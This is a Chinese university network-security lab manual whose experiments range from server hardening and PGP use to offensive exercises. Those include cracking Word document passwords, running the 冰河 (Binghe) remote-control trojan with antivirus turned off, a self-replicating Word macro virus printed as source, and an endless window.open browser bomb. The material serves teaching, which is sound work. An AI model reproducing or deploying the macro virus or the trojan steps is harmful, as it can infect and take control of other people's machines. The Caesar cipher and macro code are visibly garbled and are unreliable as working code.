网络安全技术实验报告手册.doc

网络安全技术课程实验教学手册姓 名： 学 号： 专 业： 班 级： 级 班任课教师： 时 间： 学年度 学期综合成绩： 实验手册使用及要求实验操作是教学过程中理论联系实际的重要环节，而实验报告的撰写又是知识系统化的吸收和升华过程，因此，实验报告应该体现完整性、规范性、正确性、有效性。现将实验报告撰写的有关内容说明如下：1、 实验预习报告必须在实验前完成。2、 实验时带好实验手册，指导教师签字后方可进行实验。3、 实验中认真记录，实验结束后填写实验所做内容并回答相应问题。4、 实验内容一般手写，若填写内容过多也可以打印粘贴。5、 共设计十个题目，分组进行设计和实验，详细要求参见实验指导书。实验一实 验 基 本 信 息实验名称：硬盘数据恢复工具的使用实验时间： 年 月 日 实验地点： 1-602 实验室实验目的：掌握一种硬盘数据恢复工具的使用方法实验要求：实验前的预习情况到网上搜索一款硬盘数据恢复软件（EasyRecovery Professional），看其说明学会使用实验过程描述1. 新建任意一个文档,然后按shift+delete永久删除2. 利用数据恢复软件对删除的文件进行恢复 回答问题实验成绩教师签名：实验二实 验 基 本 信 息实验名称：文档密码破解实验时间： 年 月 日 实验地点： 1-602 实验室实验目的：掌握一种文档密码破解工具的使用方法实验要求：实验前的预习情况从网上下载任一款WORD文档密码破解软件（office password remover），查看其使用方法实验过程描述1.新建一个WORD文档并对其加密。工具-选项-安全性3. 利用你所搜索的软件对你的WORD文档进行解密。 3.顺利打开你所破解后的WORD文档，实验成功。回答问题实验成绩教师签名：实验三实 验 基 本 信 息实验名称：服务器的安全配置实验时间： 年 月 日 实验地点： 1-602 实验室实验目的：掌握Windows 2000 Server不同级别的安全配置方案实验要求：实验前的预习情况实验过程描述1 初级安全配置。（1） 停用Guest帐号。任何时候都不允许Guest帐号登录系统。为了保险起见，最好给Guest 加一个复杂的密码，可以打开记事本，在里面输入一串包含特殊字符,数字，字母的长字符串。用它作为Guest帐号的密码。（2） 限制用户数量。通常帐号的数量不要超过10个。去掉所有的测试帐号、共享帐号和普通部门帐号等等。用户组策略设置相应权限，并且经常检查系统的帐号，删除已经不使用的帐号。（3） 管理员帐号改名。由于大家都熟悉Administrator帐号，所以容易给尝试猜口令的攻击者提供机会，将其伪装成普通用户可以相对减少被攻击的风险。不要使用Admin之类的名字，改了等于没改，尽量把它伪装成普通用户，比如改成：guestone。具体操作的时候只要选中帐户名改名就可以了。（4） 陷阱帐号。创建一个administrator帐户，将其放到guest组中,该帐户没有任何权限。并设置长而复杂的密码（如：32位的数字字符符号密码），设置用户不能更改密码。让入侵者在此花费无用的时间，以发现入侵者的企图。（5） 更改默认权限。把共享文件的权限从“Everyone”组改成“授权用户”。因为默认状态下“Everyone”组具有“完全控制”权限，这是相当危险的。（6） 安全密码。密码要符合一定的复杂度，尽量选择一些无意义的字符组合，并有一定的长度。这里给好密码下了个定义：安全期内无法破解出来的密码就是好密码，也就是说，如果得到了密码文档，必须花43天或者更长的时间才能破解出来，密码策略是42天必须改密码。数字+字符+符号。2 中级安全配置。（1） 利用Windows 2000的安全配置工具可以配置服务器的安全策略。在管理工具中可以找到“本地安全策略”，主界面如图所示。可以配置四类安全策略：帐户策略、本地策略、公钥策略和IP安全策略。在默认的情况下，这些策略都是没有开启的。其中安全审核是Windows 2000最基本的入侵检测方法。当有人尝试对系统进行某种方式（如尝试用户密码，改变帐户策略和未经许可的文件访问等等）入侵的时候，都会被安全审核记录下来。很多的管理员在系统被入侵了几个月都不知道，直到系统遭到破坏。表中的这些审核是必须开启的，其他的可以根据需要增加。策略设置审核系统登陆事件成功，失败审核帐户管理成功，失败审核登陆事件成功，失败审核对象访问成功审核策略更改成功，失败审核特权使用成功，失败审核系统事件成功，失败开启审核策略，可以在“本地安全设置”窗口中双击审核列表的某一项，然后在设置对话框中，将复选框“成功”和“失败”选中即可实现。开启密码策略策略设置密码复杂性要求启用密码长度最小值8位密码最长存留期42天强制密码历史5个开启帐户策略。开启帐户策略可以有效的防止字典式攻击，设置如表所示。策略设置复位帐户锁定计数器30分钟帐户锁定时间30分钟帐户锁定阈值5次（2） 关闭不必要的服务,如下表所示。在默认情况下，Windows 2000的许多服务都是开启的，这为恶意程序的运行创造了方便条件，所以有必要关闭不必要的服务。方法是：在“计算机管理”中选择“服务和应用程序”，然后在“服务”中的服务列表中找到想关闭的服务，单击鼠标右键，选择“停止”即可关闭该项服务。服务名说明Compuer Browser维护网络上计算机的最新列表以及提供这个列表Task scheduler允许程序在指定时间运行Routing and Remote Access在局域网以及广域网环境中为企业提供路由服务Removable storage管理可移动媒体、驱动程序和库Remote Registry Service允许远程注册表操作Print Spooler将文件加载到内存中以便以后打印。要用打印机的用户不能禁用这项服务IPSEC Policy Agent管理IP安全策略以及启动ISAKMP/Oakley(IKE)和IP安全驱动程序Distributed Link Tracking Client当文件在网络域的NTFS卷中移动时发送通知Com+ Event System提供事件的自动发布到订阅COM组件（3） 关闭不必要的端口。“网上邻居属性本地连接属性Internet 协议属性高级选项TCP/IP筛选属性”， 在出现的“TCP/IP筛选”对话框中添加需要的TCP、UDP端口以及IP协议即可。常用的TCP口有:80口用于Web服务；21用于FTP服务；25口用于SMTP；23口用于Telnet服务；110口用于POP3(邮件服务)。 常用的UDP端口有:53口-DNS域名解析服务；161口-SNMP简单的网络管理协议；8000、4000用于OICQ，服务器用8000来接收信息，客户端用4000发送信息。如果没有上面这些服务就没有必要打开这些端口。 （4） 不显示上次登录名。默认情况下，终端服务接入服务器时，登录对话框中会显示上次登录的帐户名，本地的登录对话框也是一样。黑客们可以得到系统的一些用户名，进而做密码猜测。修改注册表（打开注册表编辑器：开始运行regedit）可以禁止显示上次登录名，在HKEY_LOCAL_MACHINE主键下修改子键：SoftwareMicrosoftWindowsNTCurrentVersionWinlogonDontDisplayLastUserName，将键值改成“1”。 如果没有的话，创建一个。3 高级安全配置。（1） 关闭默认共享。Windows 2000/XP/2003版本的操作系统提供了默认共享功能，这些默认的共享都有“$”标志，意为隐含的，包括所有的逻辑盘（C$，D$，E$）和系统目录Winnt或Windows（admin$）。右键“停止共享”法：到“计算机管理”窗口中某个共享项（比如H$）上右键单击，选择“停止共享” 并确认后就会关闭这个共享。但这种方法治标不治本，如果机器重启的话，这些共享又会恢复。此法比较适合于永不关闭的服务器，简单而且有效。 批处理自启动法 ：打开记事本，输入以下内容（每行最后要回车）：net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /deletenet share e$ /delete（你有几个硬盘分区就写几行这样的命令）。保存为NetShare.bat，然后把这个批处理文件拖到“程序”“启动”项，这样每次开机就会运行它，也就是通过net命令关闭共享。注册表改键值法：“开始”“运行”输入“regedit”确定后，打开注册表编辑器，找到“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters”项，双击右侧窗口中的“AutoShareServer”项将键值由1改为0，这样就能关闭硬盘各分区的共享。如果没有AutoShareServer项，可自己新建一个再改键值。然后还是在这一窗口下再找到“AutoShareWks”项，也把键值由1改为0，关闭admin$共享。最后到“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa”项处找到“restrictanonymous”，将键值设为1，关闭IPC$共享。本法必须重启机器，但一经改动就会永远停止共享。停止服务法：“计算机管理”窗口中，单击展开左侧的“服务和应用程序”并选中其中的“服务”，此时右侧就列出了所有服务项目。共享服务对应的名称是“Server”（在进程中的名称为services），找到后双击它，在弹出的“常规”标签中把“启动类型”由原来的“自动”更改为“已禁用”。然后单击下面“服务状态”的“停止”按钮，确认。（2） 禁用Dump文件。在系统崩溃和蓝屏的时候，Dump文件是一份很有用资料，可以帮助查找问题。然而，也能够给黑客提供一些敏感信息，比如一些应用程序的密码等。需要禁止它，打开控制面板系统属性高级启动和故障恢复，把写入调试信息改成无，如下图所示。 （3） 关机时清除文件。页面文件也就是调度文件，是Windows 2000用来存储没有装入内存的程序和数据文件部分的隐藏文件。一些第三方的程序可以把一些没有的加密的密码存在内存中，页面文件中可能含有另外一些敏感的资料。要在关机的时候清除页面文件，可以编辑注册表 修改主键HKEY_LOCAL_MACHINE下的子键：SYSTEMCurrentControlSetControlSession ManagerMemory Management把ClearPageFileAtShutdown的值设置成“1”。（4） 锁住注册表。在Windows2000中，只有Administrators和Backup Operators才有从网络上访问注册表的权限。当帐号的密码泄漏以后，黑客也可以在远程访问注册表，当服务器放到网络上的时候，一般需要锁定注册表。修改Hkey_current_user下的子键SoftwaremicrosoftwindowscurrentversionPoliciessystem 把DisableRegistryTools的值改为“0”，类型为DWORD。（5） 禁止判断主机类型。黑客利用TTL（Time-To-Live，活动时间）值可以鉴别操作系统的类型，通过Ping指令能判断目标主机类型。Ping的用处是检测目标主机是否连通。许多入侵者首先会Ping一下主机，因为攻击某一台计算机需要根据对方的操作系统，是Windows还是Unix。如TTL值为128就可以认为你的系统为Windows 2000，如下图所示。操作系统类型TTL返回值Windows 2000128Windows NT107win9x128 or 127solaris252IRIX240AIX247Linux241 or 240修改TTL的值，入侵者就无法入侵电脑了。比如将操作系统的TTL值改为111，修改主键HKEY_LOCAL_MACHINE的子键：SYSTEMCURRENT_CONTROLSETSERVICESTCPIPPARAMETERS新建一个双字节项(defaultTTL)。（6） 禁止Guest访问日志。在默认安装的Windows NT和Windows 2000中，Guest帐号和匿名用户可以查看系统的事件日志，可能导致许多重要信息的泄漏，修改注册表来禁止Guest访问事件日志。禁止Guest访问应用日志。在HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlogApplication 下添加键值名称为：RestrictGuestAccess ，类型为：DWORD，将值设置为“1”。禁止访问系统日志：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlogSystem下添加键值名称为：RestrictGuestAccess，类型为：DWORD，将值设置为“1”。禁止访问安全日志：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlogSecurity下添加键值名称为：RestrictGuestAccess，类型为：DWORD，将值设置为“1”。回答问题实验成绩教师签名：实验四实 验 基 本 信 息实验名称：用C语言编程实现凯撒密码加密实验时间： 年 月 日 实验地点： 1-602 实验室实验目的：通过C语言编程掌握凯撒密码加密原理实验要求：实验前的预习情况实验过程描述打开C语言环境。输入如下程序：#include main()char c;while (c=getchar()!=n)if (c=a&c=A&cZ&cz)c=c-26;printf(%c,c);用明文测试程序是否正确。程序及运行结果：回答问题实验成绩教师签名：实验五实 验 基 本 信 息实验名称： PGP软件的使用实验时间： 年 月 日 实验地点： 1-602 实验室实验目的：掌握PGP软件的使用方法，对加密理论知识加深理解。掌握使用PGP软件发送安全电子邮件的方法。实验要求：实验前的预习情况实验过程描述1.到网上搜索PGP软件，下载（已提供8.1版本在“相关文件夹”中）。2.下载安装PGP后，重新启动。重启后会让你输入姓名，单位和序列号，我们不是付费用户，点“later”。接下来进行一些个人信息以及PGP简单配置。3.启动PGP后，在任务栏生成一个小锁图标。点击小锁，弹出的菜单中选择“PGPMail”,出现一个程序栏。4.生成密钥：使用PGP之前，首先需要生成一对密钥。“PGPKeys”-“Keys”-“New Key”, 开始生成密钥。出现密钥生成向导对话框。第一步，PGP会提示这个向导的目的是生成一对密钥，你可以用它来加密文件或对数字文件进行签名。第二步，如果你要选择密钥的位数或者选择其他加密算法，点击“expert”高级选项，PGP会要求你输入全名和邮件地址。虽然真实的姓名不是必须的，但是输入一个你的朋友看得懂的名字，最好能让别人一下就认出你来，会使他们在加密时很快找到想要的密钥。选择一种加密类型。指定密钥的长度。通常来说位数越大被解密的可能性越小就越安全，但是在执行解密和加密时会需要更多的时间，一般2048位就ok了。 PGP会问你密钥的过期日期，可以选择从不过期或者指定一个日期作为过期的界限。否则就按“下一步”。第三步，请重复输入你的密码Passphrase。这个密码是对你的私钥进行加密，平时私钥是不公开的，万一别人拿到了你的私钥，没有这个密码，他也没办法使用。建议你的密码大于8位，并且最好包括大小写、空格、数字、标点符号等，为了方便记忆你可以用一句话作为你的密钥，如Amy is 12 years old.等。边上的“Hide Typing”指示是否显示键入的密码。（Passphrase口令，密码短语, 在功能上，passphrase同密码一样，只是长度较密码长。通常passphrase使用4到5个单词取代原来数字、字母结合的方式）第四步，接下来PGP会花一点点时间来生成你的密钥，一直“下一步”就可以完成了。想废除密钥时，选取Revoke即可。5.导出并发送公钥：把公钥作为一个文件保存在硬盘上。并把公钥文件发送给你希望进行安全通信的联系人。用菜单keysEmport 将你的密钥导出为扩展名为asc或txt的文件，将它发给你的朋友们。默认的参数是只导出公钥。（对方则用keysimport导入）公钥导出之后，接下来就发送给需要跟你进行安全通信的人。你可以通过Email方式传送公钥或者把你的公钥放在公钥服务器上以供别人查找下载。也可以通过其他的传送方式。不过，由于在传送的过程公钥是没有采用安全机制传送，因此存在公钥被人窃取的可能。为了更加安全，双方可以根据环境选择一个比较安全的环境来传送公钥。我们可以互相通过Email传送公钥，例如，用户A和用户B要互相通信，则A需要把自己的公钥传递给B，而B需要把自己的公钥传递给A。6.数字签名：由于公钥是发放给其他人使用的，那么在公钥发放的过程中，存在公钥被人替换的可能。此时，若有一个人对此公钥是否真正属于某个用户的公钥做出证明，那么该公钥的可信任度就比较高。如果A很熟悉B，并且能断定某公钥是B的，并没有人把该公钥替换或者篡改的话，那么可以对B的公钥进行数字签名，以自己的名义保证B的公钥的真实性。具体操作为：运行“开始”“PGP”“PGPKeys”，选中要进行签名的公钥，然后右键，选择“Sign”进行签名。此时，选择该用户的公钥，并且选中“Allowsignaturetobeexported.Othersmayrelyuponyoursignature（允许该签名被导出，其他人可以信任你的签名的真实性）”，点击“OK”。 输入私钥的密码，点击“OK”。这样，对公钥的签字就完成了。如果希望发出的信件或者文件不被冒名或篡改，我们也可以对文件进行签名和加密。操作如下：选择要进行签名的文件，点击右键，选择“sign”。要注意的是，对文件签名只能证明是你发出该文件，但是文件的内容并没有被加密，同时，进行数字签名时，在意的是表明该文件是从自己这里发出，因此对于文件的内容并不在意被别人看到，经过数字签名的文件要同原明文文件一同发送给对方，对方才能验证数字签名是否有效。如果同时要表明文件从自己这里发出，同时又要对文件的信息保密，那么就选择“签名与加密”选项Encrypt&sign。同样的，在选择密钥的对话框中，从对话框上部的密钥列表中，选择接收文件的用户拖到对话框的下部，点击“OK”。 确定接收人后，输入私钥的密码，进行数字签名或数字签名和加密。收件人使用你的公钥验证签名。签名文件后，将增加一个后缀是sig文件，文件名与你签名的文件名相同，你要同时发布这两个文件，别人才能校验你发布的文件是否被改过了。7.加密与解密：加密：有了对方的公钥之后就可以用对方公钥对文件进行加密，然后再传送给对方。具体操作如下：选中要加密的文件，右键，然后选择“PGP”-“Encrypt”（或者点击“Encrypt”图标，出现选择所加密文件对话框，选择文件所在位置）。 然后在密钥选择对话框中，选择要接受文件的接收者。注意，用户所持有的密钥全部列出在对话框的上部分，选择要接收文件人的公钥，将其公钥拖到对话框的下部分（recipients），点击“OK”，并且为加密文件设置保存路径和文件名。加密文件后，将生成一个新的文件，后缀是pgp。此时，你就可以把该加密文件传送给对方。解密：对方接收到该加密文件后，选中该文件，右键，选择“Decrypt&verify”(或者点击“Decrypt/Verify”图标,弹出文件选择对话框，选择所要解密的文件之后) 此时，要求输入私钥的密码，输入完后，按“OK”即可。接下来，要为已经解密的明文文件设置保存路径文件名。保存后，明文就可以被直接查看了。使用PGP软件发送安全电子邮件：1.分发PGP公钥并发送PGP加密邮件分发PGP公钥：方法一：打开PGPkeys，在你创建的密钥对上点右键，选择“发送到”-“邮件接收人”寄给对方PGP公钥。如果系统默认是采用Outlook来收发邮件的话，将会开启Outlook并附加了你的公钥，填入对方的邮件地址，对方在收到此公钥后就能和你进行PGP加密通信了。方法二：单击显示有你刚才创建的用户那里，再在上面点右键，选“Export（导出）”（也可以点击紫色的磁盘图标实现此功能），在出现的保存对话框中，确认是只选中了“Include 6.0 Extensions”（包含6.0公钥），然后选择一个目录，再点“保存”按钮，即可导出你的公钥，扩展名为.asc。在你收到对方PGP公钥的时候，把附件*.asc导入到你PGPkey里面。导入过程：导入公钥：直接点击（根据系统设置不同，单击或者双击）对方发给你的扩展名为.asc的公钥，将会出现选择公钥的窗口，在这里你能看到该公钥的基本属性，如有效性、创建时间，信任度等，便于了解是否应该导入此公钥。选好后，点击“Import（导入）”按钮，即可导入进PGP。设置公钥属性：接下来打开PGPkeys，就能在密钥列表里看到刚才导入的密钥，选中他，点右键，选Key Properties（密钥属性），这里能查看到该密钥的全部信息，如是否是有效的密钥，是否可信任等，在这里，关闭此对话框，然后在该密钥上点右键，选Sign（签名），在出现的PGP Sign Key（PGP密钥签名）对话框中，点“OK”按钮，会出现要求为该公钥输入Passphrase的对话框，这时你就得输入你设置用户时的那个密码短语，然后继续点“OK”按钮。即完成签名操作，查看密码列表里该公钥的属性，应该在“Validity（有效性）”栏显示为绿色，表示该密钥有效。然后再点右键，选Key Properties（密钥属性），将Untrusted（不信任的）处的滑块拉到Trusted（信任的），再点“关闭”按钮即可，这时再看密钥列表里的那个公钥，Trust（信任度）处就不再是灰色了，说明这个公钥被PGP加密系统正式接受，可以投入使用了。发送PGP加密邮件：方法一：发送：在OE中，如果安装了PGPmail for OutLook Express的插件，我们可以看到PGPmail加载到了OE的工具栏里, OE创建新邮件时，检查工具栏“加密信息(PGP)”和“签名信息(PGP)”按钮状态是否按下，当书写完纯文本的加密邮件时，填入对方Email地址。点击发送，这时PGPmail将会对其使用主密钥和对方公钥进行加密，加密后的邮件也只能由你和对方才能使用自己的私钥进行解密。PGPkey会在服务器上查找相应的公钥，以免对方更新密钥而造成无法收取邮件信息。点击取消，弹出Recipient Selection接收者选择窗口，从上方的列表中用鼠标进行双击添加到下面的接收者列表里面。点击OK，就可以发送通过PGP加密的邮件。接收：连接服务器并使用Outlook收取PGP加密邮件，打开时，看到的是乱码(PGP加密后的信息),这时，我们在任务栏点击PGP图标，在弹出的菜单中点击“当前窗口”-“解密&效验”，在弹出的窗口中输入你设定的密钥密码。将会成功解密邮件信息，并弹出文本查看器窗口，这个时候我们已经看到解密后的信息了。方法二：发送：在OE中，如果未安装PGPmail for OutLook Express的插件，在准备发送PGP加密邮件之前,要先打开开始所有程序PGPPGPmail 菜单。然后打开outlook express 程序。点击创建邮件按钮.在收件人地址栏输入收件人地址及主题。选中邮件内容中的全部信息。点击鼠标右键，在弹出的菜单上看到剪切字样。点击剪切菜单后,再点击PGPmail 菜单从左数第四个按钮:(Encrypt and Sign) 。点击对话框中的Clipboard按钮。将接收文件的用户拉到Recipients区域中。点击OK按钮。在下面的Enter passphrase for above key: 输入框中输入发件人的KEY 密码，然后点击OK按钮。在贴贴板的邮件正文内容已经被经过加密,然后切换到outlook express邮件画面。在邮件的正文输入框中点击鼠标左键.然后点击上图中的粘贴按钮。看到的邮件正文已经被加密成乱码的的形式.然后点击发送按钮.这一封加密的邮件就可以成功的发送了。 接收：收件人收到邮件后，全选邮件内容,然后点击鼠标右键，点击复制，此时加密的邮件内容已经进入粘贴板中.然后在他的电脑中打开他的PGPmail程序。点击按钮:(解密/校检)。点击Clipboard按钮。只有收件人本人才拥有私钥,根据提示，在Enter passphrase for you private key的输入框中输入密码，点击OK按钮。看到邮件已经解密成功.点击复制到剪贴板(C)按钮.将邮件内容复制到粘贴板中.点击收到的邮件的回复按钮,邮件正文框点击鼠标左键.然后点击粘贴按钮.邮件正文就被还原了.方法三：发送：很多时候我们会以附件形式寄出邮件，这个时候，打开PGPmail，在PGPmail窗口中，按下“加密”，然后选择需要加密的文件，确定后在弹出的“PGPmail-密码选择对话框”中，选择你所需要使用的公钥进行加密。在Outlook中我们加入此加密文件作为附件寄出就可以了。接收：如果含有加密附件时，下载回来在本地打开，“解密&效验”，在窗口中，输入相应的密码，即可对文件进行解密并保存。回答问题实验成绩教师签名：实验六实 验 基 本 信 息实验名称：扫描器的使用实验时间： 年 月 日 实验地点： 1-602 实验室实验目的：掌握扫描器的使用方法。利用扫描器发现系统漏洞实验要求：实验前的预习情况实验过程描述1.打开并解压X-Scan（已附）。2.扫描本地主机：（1）IP地址为localhost,指定后开始扫描。（2）查看扫描结果并分析。扫描结束后，窗口中显示扫描结果。扫描结束后，得到本机普通信息、漏洞信息和HTML格式的扫描报告。分析扫描报告，能够得到非常有价值的信息。3.扫描局域网内指定服务器：（1）指定服务器IP，在指定IP范围处输入服务器IP地址，确定后开始扫描。（2）查看扫描结果并分析。（在扫描报告中，我们可以看到服务器开放了哪些端口，这些端口的开放本身就存在安全隐患，解决方案中根据问题编号，我们可以链接参考网站，从这些地方中得到对付漏洞的帮助。）4.扫描指定网段：除了对指定主机进行扫描外，还可以对指定网络范围内的多台主机进行扫描。（1）指定扫描范围。（2）查看扫描结果并分析。回答问题实验成绩教师签名：实验七实 验 基 本 信 息实验名称：冰河木马的使用实验时间： 年 月 日 实验地点： 1-602 实验室实验目的：1.掌握冰河木马的使用方法。2.掌握木马的传播和运行机制，通过相关技巧学会防御木马的相关知识实验要求：实验前的预习情况实验过程描述1. 在DOS状态下采用netstat-an观察木马服务器运行前服务器端计算机上网络连接情况。可以看到7626端口没有开放。2. 关闭两台计算机上的防火墙和杀毒软件。（冰河木马是比较早出现的木马软件，一般的杀毒软件都可以清除它）3. 在服务器计算机上运行服务器程序G_Server.exe。4. 观察木马服务器端的网络连接情况，可以看到7626端口已经开放，说明已经成功在服务器端安装了木马。5. 在客户端打开G_Client.exe。6. 单击控制端工具栏中的“添加主机”，填写显示名称和服务器端IP地址。7. 单击控制端工具栏中的“冰河信使”，向服务器端发送消息。8. 单击“命令控制台”标签，对服务器端进行控制。9. 卸载冰河木马方法一：通过杀毒软件进行卸载。方法二：采用冰河的客户端进行卸载：控制类命令系统控制自动卸载冰河。方法三：手动卸载。（1）对系统注册表进行操作，删除开机要运行的木马项“kernel.exe”。开始运行regedit: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun，删除“C:WINDOWSSYSTEMKERNEL32.EXE”和C:WINDOWSSYSTEMSYSEXPLR.EXE两项。（2）如果有进程软件，就用进程软件把KERNEL32.EXE和SYSEXPLR.EXE终止；删除C:WINDOWSSYSTEMKERNEL32.EXE和C:WINDOWSSYSTEMSYSTEMSYSEXPLR.EXE（因为程序正在运行，无法删除，所以先要终止） 。如果没有进程软件，就重新启动到DOS窗口，删除（DEL）C:WINDOWSSYSTEMKERNEL32.EXE和C:WINDOWSSYSTEMSYSTEMSYSEXPLR.EXE。（3）修改冰河文件关联。在我的电脑的菜单栏“查看”“文件夹选项”“文件类型”，找到文本文件图标查看是否用C:WINDOWSNotepad.exe程序打开，如果不是，大概是冰河木马关联了文本文件！恢复方法一：在打开方式中选择C:WINDOWSNotepad.exe程序打开即可，用鼠标右键单击文本文件，在右键上选择打开方式，选择C:WINDOWSNotepad.exe，而且在“始终使用该程序打开这种类型的文件”前面的钩打开，确定即可。如果感染了EXE文件，恢复的办法，最最简单的方法就是恢复注册表，如果感染冰河在5天以内，可在DOS状态下用scanreg/restore命令恢复，时间长一点，导入以前备份的注册表。恢复方法二：修改注册表HKEY_CLASSES_ROOTtxtfileshellopencommand下的默认值为C:WINDOWSnotepad.exe %1。10.预防：（1）不要执行任何来历不明的软件 对于从网上下载的软件在安装、使用前一定要用多几种反病毒软件，最好是专门查杀木马的软件进行检查，确定无毒了再执行、使用。（2）不要相信你的邮箱不会收到垃圾和带毒的邮件永远不要相信你的邮箱就不会收到垃圾和带毒的邮件，即使从没露过面的邮箱或是ISP邮箱，有些时候你永远没办法知道别人如何得知你的mail地址的。 （3）不要轻信他人不要因为是你的好朋友发来的软件就运行，因为你不能确保他的电脑上就不会有病毒，当然好朋友故意欺骗的可能性不大，但也许他（她）中了黑客程序自己还不知道！同时，网络发展到今天，你也不能保证这一定是你的朋友发给你的，因为别人也可冒名给你发邮件。（4）不要随便留下你的个人资料 特别不要在聊天室内公开你的Email地址。因为你永远不会知道是否有人会处心积虑收集起你的资料，以备将来黑你！更不要将重要口令和资料存放在上网的电脑里，以防黑客侵入你的电脑盗走你一切“值钱的东东”。 （5）网上不要得罪人 在聊天时，永远不要以为网络上谁也不认识谁就出言不逊，这样会不小心得罪某些高人，到时找你开刀。（6）不要随便下载软件 特别是不可靠的小FTP站点、公众新闻级、论坛或BBS上，因为这些地方正是新病毒发布的首选之地。（7）最好使用第三方邮件程序 如Foxmail等,不要使用Microsoft的Outlook程序，因为Outlook程序的安全漏洞实在太多了，况且Outlook也是那些黑客们首选攻击的对象，已经选好了许多攻击入口； （8）不要轻易打开广告邮件中附件或点击其中的链接 因为广告邮件也是那些黑客程序依附的重要对象，特别是其中的一些链接。（9）将windows资源管理器配置成始终显示扩展名 因为一些扩展名为：VBS、SHS、PIF的文件多为木马病毒的特征文件，更有些文件为又扩展名，那更应重点查看，一经发现要立即删除，千万不要打开，只有时时显示了文件的全名才能及时发现。 （10）尽量少用共享文件夹 如果因工作等其它原因必需设置成共享，则最好单独开一个共享文件夹，把所有需共享的文件都放在这个共享文件夹中，注意千万不要系统目录设置成共享！ （11）给电子邮件加密 为了确保你的邮件不被其它人看到，同时也为了防止黑客们的攻击，向大家推荐一款加密专家PGP，相信它一定不会让你失望的！ （12）隐藏IP地址这一点非常重要！你上网时最好用一些工具软件隐藏你的电脑的IP地址，如使用ICQ，就进入“ICQMenuSecurity&Privacy”，把“IPPublishing”下面的“DonotPublishIPaddress”选项上。 （13）运行反木马实时监控程序在上网时必需运行你的反木马实时监控程序，加外一些专业的最新杀毒软件、个人防火墙进行监控那更是放心了。（14）备份重要数据和系统文件。回答问题实验成绩教师签名：实验八实 验 基 本 信 息实验名称：宏病毒分析及清除实验时间： 年 月 日 实验地点： 1-602 实验室实验目的：1. 演示宏的编写2. 说明宏的原理及其安全漏洞和缺陷3. 理解宏病毒的作用机制实验要求：实验前的预习情况实验过程描述1软件设置：关闭杀毒软件；打开Word 2003，在工具宏安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问。注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。自我复制功能演示。打开一个word文档，然后按Alt+F11调用宏编写窗口（工具宏Visual Basic宏编辑器）,在左侧的projectMicrosoft Word对象ThisDocument中输入以上代码（参见源代码macro_1.txt），保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。代码如下：Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.SaveNormalPrompt = FalseSet ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModuleSet host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate Then Set host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith hostIf .Lines(1, 1) Micro-Virus Then .DeleteLines 1, .CountOfLines.InsertLines 1, ourcodemodule.Lines(1, 100).ReplaceLine 2, Sub Document_Close() If ThisDocument = NormalTemplate Then .ReplaceLine 2, Sub Document_Open() ActiveDocument.SaveAs ActiveDocument.FullName End If End IfEnd WithMsgBox MicroVirus by Content Security LabEnd Sub清除宏病毒对每一个受感染的word文档进行如下操作：打开受感染的word文档，进入宏编辑环境（Alt+F11），打开NormalMicrosoft Word对象This Document，清除其中的病毒代码（只要删除所有内容即可）。然后打开ProjectMicrosoft WordThis Document，清除其中的病毒代码。实际上，模板的病毒代码只要在处理最后一个受感染文件时清除即可，然而清除模板病毒后，如果重新打开其他已感染文件，模板将再次被感染，因此为了保证病毒被清除，可以查看每一个受感染文档的模板，如果存在病毒代码，都进行一次清除。回答问题实验成绩教师签名：实验九实 验 基 本 信 息实验名称： Web恶意代码实验时间： 年 月 日 实验地点： 1-602 实验室实验目的：掌握网页恶意代码基本原理实验要求：实验前的预习情况实验过程描述1新建Web页面，输入程序源码。程序源码如下：function WindowBomb()while (true)window.open()用IE打开该文件，观察实验结果，可以看到IE不断的打开163网页。如果IE阻止了显示内容，右键点击出现的提示信息，选择“允许阻止的内容”，就可以看到实验现象。2新建Web页面，编辑程序源码。程序源码如下：var color = new Arraycolor0